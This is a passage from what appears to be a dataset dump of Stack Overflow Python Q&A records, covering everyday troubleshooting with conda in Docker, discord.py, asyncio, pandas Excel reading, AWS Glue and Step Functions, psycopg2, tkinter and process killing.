The 7000 is your model's total number of samples, so the model doesn't know in advance what your batch-size will be. The other big issue is that most of the time your batch-size is not evenly divisible by the total number of samples in the dataset; therefore, it is necessary for the model to make it None and fill it in later, when it computes all the batches in the very first epoch.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75368928,"CreationDate":"2023-02-07 04:20:39","Q_Score":1,"ViewCount":123,"Question":"I have a Dockerfile like below:\nFROM continuumio\/miniconda3\n\nRUN conda update -n base -c defaults conda\nRUN conda create -c conda-forge -n pymc3_env pymc3 numpy theano-pymc mkl mkl-service\n\nCOPY .\/src \/app\n\nWORKDIR \/app\n\nCMD [\"conda\", \"run\", \"-n\", \"pymc3_env\", \"python\", \"ma.py\"]\n\nI get the following error:\n------ \n > [3\/5] RUN conda create -c conda-forge -n pymc3_env pymc3 numpy theano-pymc mkl mkl-service: \n#0 0.400 Collecting package metadata (current_repodata.json): ...working... done \n#0 9.148 Solving environment: ...working... failed with repodata from current_repodata.json, will retry with next repodata source. \n#0 9.149 Collecting package metadata (repodata.json): ...working... done \n#0 45.81 Solving environment: ...working... 
failed \n#0 45.82 \n#0 45.82 PackagesNotFoundError: The following packages are not available from current channels:\n#0 45.82 \n#0 45.82 - mkl-service\n#0 45.82 - mkl\n#0 45.82 \n#0 45.82 Current channels:\n#0 45.82 \n#0 45.82 - https:\/\/conda.anaconda.org\/conda-forge\/linux-aarch64\n#0 45.82 - https:\/\/conda.anaconda.org\/conda-forge\/noarch\n#0 45.82 - https:\/\/repo.anaconda.com\/pkgs\/main\/linux-aarch64\n#0 45.82 - https:\/\/repo.anaconda.com\/pkgs\/main\/noarch\n#0 45.82 - https:\/\/repo.anaconda.com\/pkgs\/r\/linux-aarch64\n#0 45.82 - https:\/\/repo.anaconda.com\/pkgs\/r\/noarch\n#0 45.82 \n#0 45.82 To search for alternate channels that may provide the conda package you're\n#0 45.82 looking for, navigate to\n#0 45.82 \n#0 45.82 https:\/\/anaconda.org\n#0 45.82 \n#0 45.82 and use the search bar at the top of the page.\n#0 45.82 \n#0 45.82 \n------\nfailed to solve: executor failed running [\/bin\/sh -c conda create -c conda-forge -n pymc3_env pymc3 numpy theano-pymc mkl mkl-service]: exit code: 1\n\n\nCan anybody help me to understand why conda could not find mkl and mkl-service in conda-forge channel and what do I need to resolve this?\nI am using macos as a host, if it is any concern.\nThanks in advance for any help.","Title":"unable to install mkl mkl-service using conda in docker","Tags":"python,linux,docker,anaconda,conda","AnswerCount":1,"A_Id":75375632,"Answer":"MKL only works for x86_64, that is the Docker image must use the platform linux\/amd64. 
So, either specify --platform=linux\/amd64 in the build command line or in the FROM.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75370722,"CreationDate":"2023-02-07 08:32:02","Q_Score":1,"ViewCount":56,"Question":"I am trying to get the last message that user 476686545034674176 sent in channel 1049386904065409054 and when I try to debug it, I either get a weird output or an error that says it is a Nonetype after I got an output that should trigger if it got a message.\nI tried:\n@client.event\nasync def on_ready():\n print('Logged in as')\n print(client.user.name)\n print(client.user.id)\n print('------')\n\n await tree.sync(guild=discord.Object(id=1049253865112997888))\n\n aviv_venting_about_his_shitass_brothers = client.get_channel(1049386904065409054)\n global last_message\n async for message in aviv_venting_about_his_shitass_brothers.history(limit=1000):\n if message.author.id == 476686545034674176:\n last_message = message\n\n if last_message is None:\n print('no messages found')\n elif last_message.content == None:\n print('invalid message')\n else:\n print(f'found message {last_message.content}')\n break\n\nThere is a line later in the code:\n await interaction.response.send_message(f'aviv last vented at {datetime.datetime.fromtimestamp(last_message.created_at).strftime(\"%Y-%m-%d %H:%M:%S\")} <@{interaction.user.id}>')\n\nand it gives me this error:\ndiscord.app_commands.errors.CommandInvokeError: Command 'last_vent' raised an exception: TypeError: 'datetime.datetime' object cannot be interpreted as an integer\nI expected to get an output when the bot starts up and I either get no output or 'found message'","Title":"How do I get the last message sent by a certain user in a certain channel with discord.py?","Tags":"python,discord.py","AnswerCount":1,"A_Id":75370912,"Answer":"Your problem is not that the bot doesn't find a matching message, its problem lies within the execution of the send_message command. 
Read the error message. You're trying to pass an invalid type for an argument. I am not familiar with the intricacies of discord.py, but if I could hazard a guess, last_message.created_at already is a datetime object.","Users Score":0,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75372032,"CreationDate":"2023-02-07 10:26:26","Q_Score":4,"ViewCount":157,"Question":"The subject contains the whole idea. I came accross code sample where it shows something like:\nasync for item in getItems():\n await item.process()\n\nAnd others where the code is:\nfor item in await getItems():\n await item.process()\n\nIs there a notable difference in these two approaches?","Title":"In Python, what is the difference between `async for x in async_iterator` and `for x in await async_iterator`?","Tags":"python,python-3.x,asynchronous,python-asyncio","AnswerCount":2,"A_Id":75373144,"Answer":"Those are completely different.\nThis for item in await getItems() won't work (will throw an error) if getItems() is an asynchronous iterator or asynchronous generator, it may be used only if getItems is a coroutine which, in your case, is expected to return a sequence object (simple iterable).\nasync for is a conventional (and pythonic) way for asynchronous iterations over async iterator\/generator.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75372851,"CreationDate":"2023-02-07 11:40:36","Q_Score":1,"ViewCount":326,"Question":"I'm trying to use TA-lib for a hobby project. 
I found some code snippets as reference telling me to do the following:\nimport talib as ta\nta.add_all_ta_features(\"some parameters here\")\n\nI get the following error when running the code:\nta.add_all_ta_features( AttributeError: module 'talib' has no attribute 'add_all_ta_features'\nIt looks like I need to manually add all the features I want, as I can't find the attribute .add_all_ta_features in the talib folder.\nI've installed TA-Lib and made it a 64-bit library using Visual Studio and managed to run TA-Lib in other projects before, but have never used the .add_all_ta_features attribute.\nDoes anybody know how I can fix this? Google seems to not return any useful results when searched for this. The documentation I'm following also does not mention anything about this attribute.\nI tried using pandas_ta and tried using the Google Colab space, but both return the same error.","Title":"TA-LIB module has no attribute 'add_all_ta_features'","Tags":"python,ta-lib","AnswerCount":1,"A_Id":75382873,"Answer":"Found the problem. I was trying to use TA-Lib as TA, but nowhere was it specified that we need a separate library, simply called ta, which is not the same as TA-Lib and is what actually provides add_all_ta_features.\nThanks!","Users Score":1,"is_accepted":false,"Score":0.1973753202,"Available Count":1},{"Q_Id":75374930,"CreationDate":"2023-02-07 14:42:37","Q_Score":1,"ViewCount":58,"Question":"I am trying to find all observations that are located within 100 meters of a set of coordinates.\nI have two dataframes, Dataframe1 has 400 rows with coordinates, and for each row, I need to find all the observations from Dataframe2 that are located within 100 meters of that location, and count them. Ideally,\nBoth the dataframes are formatted like this:\n| Y | X | observations_within100m |\n|:----:|:----:|:-------------------------:|\n|100 |100 | 22 |\n|110 |105 | 25 |\n|110 |102 | 11 |\n\n\nI am looking for the most efficient way to do this computation, as Dataframe2 has over 200 000 dwelling locations. 
I know it can be done with applying a distance function with something as a for loop but I was wondering what the best method is here.","Title":"Most resource-efficient way to calculate distance between coordinates","Tags":"python,pandas","AnswerCount":2,"A_Id":75375261,"Answer":"If there's a small area you're working on, you could make a grid of all known locations, then for each point precompute a list of which entries in df1 which are withing 100m from that point.\nStep 2 would be to go thru the 200k lines df2 and increase the count for the df1 entries found at the point correspondingly.\nOtherwise, this problem is similar to collision detection, for which there might be smart implementations. e.g. pygame has one, no idea though how efficient. Depending on how sparse the area is there might be gains thru dividing it into cells, so you'd only have to detect collision\/distance for the entries in that cell, decreasing from 400 objects you'd have to check against for each of the 200k.\nHope the answer was helpful and good luck!","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75375998,"CreationDate":"2023-02-07 16:02:56","Q_Score":1,"ViewCount":284,"Question":"My team is using AWS Glue endpoints to locally develop using VS code notebooks, this morning for some reason - our endpoints get the error below. Its 3 machines (Mac, Linux and Windows) that did not update anything and just suddenly got this error when trying to use the Glue endpoint. Anyone else getting this error? Whats even stranger is that the fourth developer, who does not have a different setup can still use the endpoint.\nIf I create a notebook using jupyter notebook and use the glue pyspark kernel there, it will work. Any attempt at updating or redownloading Python \/ the packages has no effect.\nWhen I add a print to this library I can see the Data object is empty. 
If I comment this line out I am unable to see outputs from my notebook.\nAnyone else getting this error?\nThe error:\nTrying to create a Glue session for the kernel.\nWorker Type: G.1X\nNumber of Workers: 2\nSession ID: 6f7ecef2-de6a-44fe-bbfc-bf8b1fa53ce5\nApplying the following default arguments:\n--glue_kernel_version 0.35\n--enable-glue-datacatalog true\n--additional-python-modules great-expectations==0.15.17\n--conf spark.sql.legacy.parquet.int96RebaseModeInWrite=CORRECTED --conf spark.sql.legacy.parquet.int96RebaseModeInRead=CORRECTED --conf spark.sql.legacy.parquet.datetimeRebaseModeInRead=CORRECTED\n--enable-job-insights true\nWaiting for session 6f7ecef2-de6a-44fe-bbfc-bf8b1fa53ce5 to get into ready status...\nSession 6f7ecef2-de6a-44fe-bbfc-bf8b1fa53ce5 has been created\n\nException encountered while running statement: 'TextPlain' \nTraceback (most recent call last):\n File \"\/home\/user\/.local\/lib\/python3.10\/site-packages\/aws_glue_interactive_sessions_kernel\/glue_pyspark\/GlueKernel.py\", line 163, in do_execute\n self._send_output(statement_output[\"Data\"][\"TextPlain\"])\nKeyError: 'TextPlain'","Title":"Exception encountered while running statement: 'TextPlain' for Glue session","Tags":"python,aws-glue","AnswerCount":1,"A_Id":75389505,"Answer":"I had the same issue but I managed to fix it by\ndowngrading to python3.9 from python3.10,\nupdated aws-glue-sessions to 0.37.0 from 0.35.0\nand downgrading psutil to 5.9.1.\nThere could potentially be other issues but those should be apparent in the \"Output\" tab in VSCode.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75378061,"CreationDate":"2023-02-07 19:23:42","Q_Score":1,"ViewCount":145,"Question":"Can mypy check that a NumPy array of floats is passed as a function argument? 
For the code below mypy is silent when an array of integers or booleans is passed.\nimport numpy as np\nimport numpy.typing as npt\n\ndef half(x: npt.NDArray[np.cfloat]):\n return x\/2\n\nprint(half(np.full(4,2.1)))\nprint(half(np.full(4,6))) # want mypy to complain about this\nprint(half(np.full(4,True))) # want mypy to complain about this","Title":"How to use mypy to ensure that a NumPy array of floats is passed as function argument?","Tags":"python,numpy,numpy-ndarray,mypy","AnswerCount":1,"A_Id":75378152,"Answer":"Mypy can check the type of values passed as function arguments, but it currently has limited support for NumPy arrays. You can use the numpy.typing.NDArray type hint, as in your code, to specify that the half function takes a NumPy array of complex floats as an argument. However, mypy will not raise an error if an array of integers or booleans is passed, as it currently cannot perform type-checking on the elements of the array. To ensure that only arrays of complex floats are passed to the half function, you will need to write additional runtime checks within the function to validate the input.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75378081,"CreationDate":"2023-02-07 19:26:13","Q_Score":1,"ViewCount":152,"Question":"I have two relatively large dataframes (less than 5MB), which I receive from my front-end as files via my API Gateway. I am able to receive the files and can print the dataframes in my receiver Lambda function. From my Lambda function, I am trying to invoke my state machine (which just cleans up the dataframes and does some processing). 
However, when passing my dataframe to my step function, I receive the following error:\nClientError: An error occurred (413) when calling the StartExecution operation: HTTP content length exceeded 1049600 bytes\n\nMy Receiver Lambda function:\ndict = {}\ndict['username'] = arr[0]\ndict['region'] = arr[1]\ndict['country'] = arr[2]\ndict['grid'] = arr[3]\ndict['physicalServers'] = arr[4] #this is one dataframe in json format\ndict['servers'] = arr[5] #this is my second dataframe in json format\n\nclient = boto3.client('stepfunctions')\nresponse = client.start_execution(\n stateMachineArn='arn:aws:states:us-west-2:##:stateMachine:MyStateMachineTest',\n name='testStateMachine',\n input= json.dumps(dict)\n)\n\nprint(response)\n\nIs there something I can do to pass in my dataframes to my step function? The dataframes contain sensitive customer data which I would rather not store in my S3. I realize I can store the files into S3 (directly from my front-end via pre-signed URLs) and then read the files from my step function but this is one of my least preferred approaches.","Title":"Passing in a dataframe to a stateMachine from Lambda","Tags":"python,pandas,amazon-web-services,aws-lambda,aws-step-functions","AnswerCount":1,"A_Id":75378554,"Answer":"Passing them as direct input via input= json.dumps(dict) isn't going to work, as you are finding. You are running up against the size limit of the request. You need to save the dataframes to a file, somewhere the step functions can access it, and then just pass the file paths as input to the step function.\nThe way I would solve this is to write the data frames to files in the Lambda file system, with some random ID, perhaps the Lambda invocation ID, in the filename. Then have the Lambda function copy those files to an S3 bucket. 
Finally invoke the step function with the S3 paths as part of the input.\nOver on the Step Functions side, have your state machine expect S3 paths for the physicalServers and servers input values, and use those paths to download the files from S3 during state machine execution.\nFinally, I would configure an S3 lifecycle policy on the bucket, to remove any objects more than a few days old (or whatever time makes sense for your application) so that the bucket doesn't get large and run up your AWS bill.\n\nAn alternative to using S3 would be to use an EFS volume mount in both this Lambda function, and in the Lambda function or (or EC2 or ECS) that your step function is executing. With EFS your code could write and read from it just like a local file system, which would eliminate the steps of copying to\/from S3, but you would have to add some code at the end of your step function to clean up the files after you are done since EFS won't do that for you.","Users Score":1,"is_accepted":false,"Score":0.1973753202,"Available Count":1},{"Q_Id":75380280,"CreationDate":"2023-02-08 00:18:28","Q_Score":1,"ViewCount":859,"Question":"I am trying to insert data into my database using psycopg2 and I get this weird error. I tried some things but nothing works. 
This is my code:\ndef insert_transaction():\nglobal username\nnow = datetime.now()\ndate_checkout = datetime.today().strftime('%d-%m-%Y')\ntime_checkout = now.strftime(\"%H:%M:%S\")\n\nusername = \"Peter1\"\n\nconnection_string = \"host='localhost' dbname='Los Pollos Hermanos' user='postgres' password='******'\"\nconn = psycopg2.connect(connection_string)\ncursor = conn.cursor()\ntry:\n query_check_1 = \"\"\"(SELECT employeeid FROM employee WHERE username = %s);\"\"\"\n cursor.execute(query_check_1, (username,))\n employeeid = cursor.fetchone()[0]\n conn.commit()\nexcept:\n print(\"Employee error\")\n\ntry:\n query_check_2 = \"\"\"SELECT MAX(transactionnumber) FROM Transaction\"\"\"\n cursor.execute(query_check_2)\n transactionnumber = cursor.fetchone()[0] + 1\n conn.commit()\nexcept:\n transactionnumber = 1\n\n\"\"\"\"---------INSERT INTO TRANSACTION------------\"\"\"\n\n\nquery_insert_transaction = \"\"\"INSERT INTO transactie (transactionnumber, date, time, employeeemployeeid)\n VALUES (%s, %s, %s, %s);\"\"\"\ndata = (transactionnumber, date_checkout, time_checkout, employeeid)\ncursor.execute(query_insert_transaction, data)\nconn.commit()\nconn.close()\n\nthis is the error:\n\", line 140, in insert_transaction\ncursor.execute(query_insert_transaction, data) psycopg2.errors.InFailedSqlTransaction: current transaction is aborted, commands ignored until end of transaction block","Title":"psycopg2.errors.InFailedSqlTransaction: current transaction is aborted, commands ignored until end of transaction block, dont know how to fix it","Tags":"python,sql,postgresql,psycopg2","AnswerCount":2,"A_Id":76561514,"Answer":"Executing the conn.rollback() function after checking for errors and executing the code again should help!","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75381096,"CreationDate":"2023-02-08 03:21:32","Q_Score":1,"ViewCount":204,"Question":"We are developing a prediction model using deepchem's GCNModel.\nModel learning and 
performance verification proceeded without problems, but it was confirmed that a lot of time was spent on prediction.\nWe are trying to predict a total of 1 million data, and the parameters used are as follows.\nmodel = GCNModel(n_tasks=1, mode='regression', number_atom_features=32, learning_rate=0.0001, dropout=0.2, batch_size=32, device=device, model_dir=model_path)\nI changed the batch size to improve the performance, and it was confirmed that the time was faster when the value was decreased than when the value was increased.\nAll models had the same GPU memory usage.\nFrom common sense I know, it is estimated that the larger the batch size, the faster it will be. But can you tell me why it works in reverse?\nWe would be grateful if you could also let us know how we can further improve the prediction time.","Title":"In deep learning, can the prediction speed increase as the batch size decreases?","Tags":"python,deep-learning,batchsize","AnswerCount":2,"A_Id":75381683,"Answer":"There are two components regarding the speed:\n\nYour batch size and model size\nYour CPU\/GPU power in spawning and processing batches\n\nAnd two of them need to be balanced. For example, if your model finishes prediction of this batch, but the next batch is not yet spawned, you will notice a drop in GPU utilization for a brief moment. Sadly there is no inner metrics that directly tell you this balance - try using time.time() to benchmark your model's prediction as well as the dataloader speed.\nHowever, I don't think that's worth the effort, so you can keep decreasing the batch size up to the point there is no improvement - that's where to stop.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75381830,"CreationDate":"2023-02-08 05:53:21","Q_Score":1,"ViewCount":113,"Question":"I have python script to copy data from excel to CSV file. I have created Execute Process Task package in SSIS and deployed to SSISDB. 
This works fine when I execute it in SSIS and in SSISDB manually. However, if I schedule or execute it through SQL Server Agent it fails. I am using a proxy account to schedule the package. Other \"non-python\" SSIS packages run fine in SQL Server Agent.\nError -\n\nExecute PY Script:Error: In Executing C:\\Program\nFiles\\Python311\\python.exe\" \"\\\\org\\data\\project\\test.py\" at\n\"\\\\org\\data\\project\", The process exit code was \"1\" while the\nexpected was \"0\".\n\nPython Script -\nprint('Start CSV File Conversion') \nimport pandas as pd\nfrom pandas import DataFrame, read_csv\nfile = r'\\\\\\org\\data\\project\\test.xlsm'\ndframe = pd.read_excel(file, sheet_name='data')\nexport_csv = dframe.to_csv( R'\\\\\\org\\data\\project\\test.csv', index=None, header=True, sep='~')\nprint(dframe)\nprint('...Completed')\n\nAll files are saved in \\\\org\\data\\project\nI am learning Python. Any inputs will be helpful.\nThank you.","Title":"SSIS package fails in SQL server Agent","Tags":"python,sql-server,ssis","AnswerCount":1,"A_Id":75396800,"Answer":"That doesn't look like an SSIS-related error but a Python error. 
Check your code; maybe create a VS project where you can test it, to escape the complexity of running through SSIS.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75382340,"CreationDate":"2023-02-08 07:02:00","Q_Score":1,"ViewCount":3562,"Question":"I don't know why this error occurs.\npd.read_excel('data\/A.xlsx', usecols=[\"B\", \"C\"])\n\nThen I get this error:\n\"Value must be either numerical or a string containing a wild card\"\n\nSo I changed my code to use nrows on all the data:\npd.read_excel('data\/A.xlsx', usecols=[\"B\",\"C\"], nrows=172033)\n\nThen there is no error and a dataframe is created.\nMy Excel file has 172034 rows; the 1st is the column names.","Title":"python pandas read_excel error \"Value must be either numerical or a string containing a wild card\"","Tags":"python,excel,pandas","AnswerCount":1,"A_Id":75764831,"Answer":"If you deselect all your filters the read_excel function should work.","Users Score":6,"is_accepted":false,"Score":1.0,"Available Count":1},{"Q_Id":75384904,"CreationDate":"2023-02-08 11:08:54","Q_Score":2,"ViewCount":76,"Question":"I need help with killing an application in Linux.\nAs a manual process I can use the command -- ps -ef | grep \"app_name\" | awk '{print $2}'\nIt will give me job ids and then I will kill them using the command \"kill -9 jobid\".\nI want to have a Python script which can do this task.\nI have written code as\nimport os\nos.system(\"ps -ef | grep app_name | awk '{print $2}'\")\n\nThis collects the job ids, but the return value is an \"int\" (the exit status, not the output), so I am not able to kill the application.\nCan you please help here?\nThank you","Title":"Kill application in linux using python","Tags":"python,linux","AnswerCount":2,"A_Id":75385024,"Answer":"To kill a process in Python, call os.kill(pid, sig), with sig = 9 (signal number for SIGKILL) and pid = the process ID (PID) to kill.\nTo get the process ID, use os.popen instead of os.system above. Alternatively, use subprocess.Popen(..., stdout=subprocess.PIPE). 
In both cases, call the .readline() method, and convert the return value of that to an integer with int(...).","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75384957,"CreationDate":"2023-02-08 11:13:14","Q_Score":1,"ViewCount":789,"Question":"We have a poetry project with a pyproject.toml file like this:\n[tool.poetry]\nname = \"daisy\"\nversion = \"0.0.2\"\ndescription = \"\"\nauthors = [\"\"]\n\n[tool.poetry.dependencies]\npython = \"^3.9\"\npandas = \"^1.5.2\"\nDateTime = \"^4.9\"\nnames = \"^0.3.0\"\nuuid = \"^1.30\"\npyyaml = \"^6.0\"\npsycopg2-binary = \"^2.9.5\"\nsqlalchemy = \"^2.0.1\"\npytest = \"^7.2.0\"\n\n[tool.poetry.dev-dependencies]\njupyterlab = \"^3.5.2\"\nline_profiler = \"^4.0.2\"\nmatplotlib = \"^3.6.2\"\nseaborn = \"^0.12.1\"\n\n[build-system]\nrequires = [\"poetry-core>=1.0.0\"]\nbuild-backend = \"poetry.core.masonry.api\"\n\nWhen I change the file to use Python 3.11 and run poetry update we get the following error:\nCurrent Python version (3.9.7) is not allowed by the project (^3.11).\nPlease change python executable via the \"env use\" command.\n\nI only have one env:\n> poetry env list\ndaisy-Z0c0FuMJ-py3.9 (Activated)\n\nStrangely this issue does not occur on my Macbook, only on our Linux machine.","Title":"Current Python version (3.9.7) is not allowed by the project (^3.11)","Tags":"python,python-poetry","AnswerCount":1,"A_Id":75394642,"Answer":"Poetry cannot update the Python version of an existing venv. 
Remove the existing one and run poetry install again.","Users Score":1,"is_accepted":false,"Score":0.1973753202,"Available Count":1},{"Q_Id":75386792,"CreationDate":"2023-02-08 13:54:05","Q_Score":1,"ViewCount":783,"Question":"When I try to read a xlsx file using pandas, I receive the error \"numpy has no float attribute\", but I'm not using numpy in my code, I get this error when using the code below\ninfo = pd.read_excel(path_info)\nThe xlsx file I'm using has just some letters inside of it for test purpouses, there's no numbers or floats.\nWhat I want to know is how can I solve that bug or error.\nI tried to create different files, change my info type to specify a pd.dataframe too\nPython Version 3.11\nPandas Version 1.5.3","Title":"Numpy has no float attribute error when using Read_Excel","Tags":"python,excel,pandas,numpy","AnswerCount":2,"A_Id":75415344,"Answer":"Had the same problem. Fixed it by updating openpyxl to latest version.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75387489,"CreationDate":"2023-02-08 14:49:43","Q_Score":1,"ViewCount":49,"Question":"I have a dataframe 'qbPast' which contains nfl player data for a season.\nP Player Week Team Opp Opp Rank Points Def TD Def INT Def Yds\/att Year\n2 QB Kyler Murray 2 ARI MIN 14 38.10 1.8125 1.0000 6.9 2021\n3 QB Lamar Jackson 2 BAL KC 6 37.26 1.6875 0.9375 7 2021\n5 QB Tom Brady 2 TB ATL 28 30.64 1.9375 0.7500 6.8 2021\n\nI am attempting to create a new rolling average based on the \"Points\" column for each individual player for each 3 week period, for the first two weeks it should just return the points for that week and after that it should return the average for the 3 week moving period e,g Player A scores 20,30,40,30,40 the average should return 20,30,30,33.3 etc.\nMy attempt # qbPast['Avg'] = qbPast.groupby('Player')['Points'].rolling(3).mean().reset_index(drop=True) \nThe problem is it is only returning the 3 week average for all players I need it to filter by 
player so that it returns the rolling average for each player, the other players should not affect the rolling average.","Title":"Rolling average Pandas for 3 week period for specific column values","Tags":"python,pandas,dataframe","AnswerCount":3,"A_Id":75387668,"Answer":"You have to change the .reset_index(drop=True) into .reset_index(0, drop=True) so it is not mixing the players indices together.","Users Score":1,"is_accepted":false,"Score":0.0665680765,"Available Count":1},{"Q_Id":75387600,"CreationDate":"2023-02-08 14:57:59","Q_Score":9,"ViewCount":3917,"Question":"I can read an Excel file from pandas as usual:\ndf = pd.read_excel(join(\".\/data\", file_name) , sheet_name=\"Sheet1\")\n\nI got the following error:\n\nValueError: Value must be either numerical or a string containing a\nwildcard\n\nWhat I'm doing wrong?\nI'm using: Pandas 1.5.3 + python 3.11.0 + xlrd 2.0.1","Title":"Unable to read an Excel file using Pandas","Tags":"pandas,openpyxl,xlrd,python-3.11","AnswerCount":3,"A_Id":76631500,"Answer":"For people like me who are wondering what sort and filter is, it is an option in your Excel viewer. If you are using Microsoft Excel, you can go to the tab \"Home\" and then to the right side of the tab, you can find Sort & Filter, from there select Clear.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":2},{"Q_Id":75387600,"CreationDate":"2023-02-08 14:57:59","Q_Score":9,"ViewCount":3917,"Question":"I can read an Excel file from pandas as usual:\ndf = pd.read_excel(join(\".\/data\", file_name) , sheet_name=\"Sheet1\")\n\nI got the following error:\n\nValueError: Value must be either numerical or a string containing a\nwildcard\n\nWhat I'm doing wrong?\nI'm using: Pandas 1.5.3 + python 3.11.0 + xlrd 2.0.1","Title":"Unable to read an Excel file using Pandas","Tags":"pandas,openpyxl,xlrd,python-3.11","AnswerCount":3,"A_Id":75404407,"Answer":"I got the same issue and then realized that the sheet I was reading is in \"filtering\" mode. 
Once I deselect \"sort&filter\", the read_excel function works.","Users Score":14,"is_accepted":true,"Score":1.2,"Available Count":2},{"Q_Id":75387699,"CreationDate":"2023-02-08 15:04:55","Q_Score":1,"ViewCount":46,"Question":"I'm trying to show a list of elements from a data set in a tkinter window. I want to able to manipulate the elements, by highlighting, deleting etc.\nI have this code:\nfrom tkinter import *\n\nwindow = Tk()\nwindow.geometry(\"100x100\")\n\n#data from API\ndata_list = [\n [\"1\", \"Lorem\"],\n [\"2\", \"Lorem\"],\n [\"3\", \"Lorem\"],\n [\"4\", \"Lorem\"]\n]\n\n#create selectable rectangles from data_list with delete buttons\nrectangles = {}\ndelete_buttons = {}\n\ndef CreateRectangles():\n i = 0\n for data in data_list:\n rectangles[i] = Canvas(window, bg=\"#BFBFBF\", height=15, width=80)\n rectangles[i].place(x=19, y=20.0 + (i * 19))\n rectangles[i].create_text(5.0, 1.0, anchor=\"nw\", text=str(f'#{data[0]}:{data[1]}'))\n\n delete_buttons[i] = Label(window, text=\"X \", bg=\"#D9D9D9\")\n delete_buttons[i].place(x=6, y=20.0 + (i * 19))\n\n i += 1\n\nCreateRectangles()\n\n#highlight clicked rectangle\ndef RectangleClick(e, arg):\n #reset how all rectangles look\n for i in rectangles:\n rectangles[i].config(bg=\"#BFBFBF\")\n #highlight the one clicked\n rectangles[arg].config(bg=\"#999999\")\n\nfor key in rectangles:\n rectangles[key].bind(\"\", lambda event, arg=key: RectangleClick(event, arg))\n\n#delete button action\ndef DeleteClick(e, arg):\n # delete all rectangles and buttons from window\n for rectangle in rectangles:\n rectangles[rectangle].place_forget()\n for delete in delete_buttons:\n delete_buttons[delete].destroy()\n\n # delete all rectangles and buttons from dictionary\n rectangles.clear()\n delete_buttons.clear()\n\n # delete the specific data from de data_list\n data_list.pop(arg)\n\n # re do everything but now the data list has one less item\n CreateRectangles()\n\nfor num in delete_buttons:\n delete_buttons[num].bind(\"\", 
lambda event, arg=num: DeleteClick(event, arg))\n\nwindow.mainloop()\n\nIt only works the first time. For example, if I delete an item, it doesn't do anything else.\nWhat's wrong?","Title":"Python dictionary, list and for-loop bug","Tags":"python,function,dictionary,for-loop,tkinter","AnswerCount":1,"A_Id":75387728,"Answer":"Move all the code that binds event handlers inside the CreateRectangles method. Since all the previous rectangles are destroyed, the event handlers need to be attached again.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75388233,"CreationDate":"2023-02-08 15:43:34","Q_Score":1,"ViewCount":48,"Question":"Brief explanation of my program (or what it's meant to do):\nI have created a simulation program that models amoeba populations in Pygame. The program uses two classes - Main and Amoeba. The Main class runs the simulation and displays the results on a Pygame window and a Matplotlib plot. The Amoeba class models the properties and behavior of each amoeba in the population, including its maturing speed, age, speed, and movement direction. The simulation runs in a loop until the \"q\" key is pressed or the simulation is stopped. The GUI is created using the Tkinter library, which allows the user to interact with the simulation by starting and stopping it. The simulation updates the amoeba population and displays their movements on the Pygame window and updates the Matplotlib plot every 100 steps. The plot displays the average maturing speed and the reproduction rate of the amoeba population.\nMy issue is that whilst the stop button in the GUI works fine, the start button does not. It registers being pressed and actually outputs the variable it is meant to change to the terminal (the running variable which you can see more of in the code). So the issue is not in the button itself, but rather the way in which the program is restarted. I have tried to do this via if statements and run flags but it has failed. 
There are no error messages, the program just remains paused.\nHere is the code to run the simulation from my Main.py file (other initialisation code before this):\ndef run_simulation():\n global step_counter\n global num_collisions\n global run_flag\n while run_flag:\n\n if globalvars.running:\n #main code here\n \n else:\n run_flag = False\n\n\ngc.root = tk.Tk()\napp = gc.GUI(gc.root)\napp.root.after(100, run_simulation)\ngc.root.mainloop()\n\nThis is the code from my GUI class:\nimport tkinter as tk\nimport globalvars\n\nclass GUI:\n def __init__(self,root):\n self.root = root\n self.root.title(\"Graphical User Interface\")\n self.root.geometry(\"200x200\")\n self.startbutton = tk.Button(root, bg=\"green\", text=\"Start\", command=self.start)\n self.startbutton.pack()\n self.stopbutton = tk.Button(root, bg=\"red\", text=\"Stop\", command=self.stop)\n self.stopbutton.pack()\n \n def start(self):\n globalvars.running = True\n print(globalvars.running)\n \n def stop(self):\n globalvars.running = False\n print(globalvars.running)\n\nAlso in a globalvars.py file I store global variables which includes the running var.\nWould you mind explaining the issue please?","Title":"Tkinter GUI start button registering input but not restarting program","Tags":"python,tkinter","AnswerCount":1,"A_Id":75394947,"Answer":"There's a logic error in the application: when stop() is called it sets globalvars.running = False. 
This means, in run_simulation() the else branch is executed which turns run_flag = False.\nThis variable is never reset to True!\nSo the while loop is left and never entered again and #main code here not executed.\nIn addition to setting run_flag = True, function run_simulation() needs to be called from start().\nTurned my earlier comment into an answer so it can be accepted and the question resolved.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75389906,"CreationDate":"2023-02-08 17:58:14","Q_Score":1,"ViewCount":133,"Question":"I am using asyncio.gather to run many query to an API. My main goal is to execute them all without waiting one finish for start another one.\nasync def main(): \n order_book_coroutines = [asyncio.ensure_future(get_order_book_list()) for exchange in exchange_list]\n results = await asyncio.gather(*order_book_coroutines)\n\n\n\nasync def get_order_book_list():\n print('***1***')\n sleep(10)\n try:\n #doing API query\n except Exception as e:\n pass\n print('***2***')\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n\nMy main problem here is the ouput :\n***1***\n***2***\n***1***\n***2***\n***1***\n***2***\n\nI was waiting something like :\n***1***\n***1***\n***1***\n***2***\n***2***\n***2***\n\nThere is a problem with my code ? or i miss understood asyncio.gather utility ?","Title":"asyncio.gather doesn't execute my task in same time","Tags":"python,python-asyncio","AnswerCount":1,"A_Id":75390156,"Answer":"Is there a problem with my code? Or I misunderstood the asyncio.gather utility?\n\nNo, you did not. 
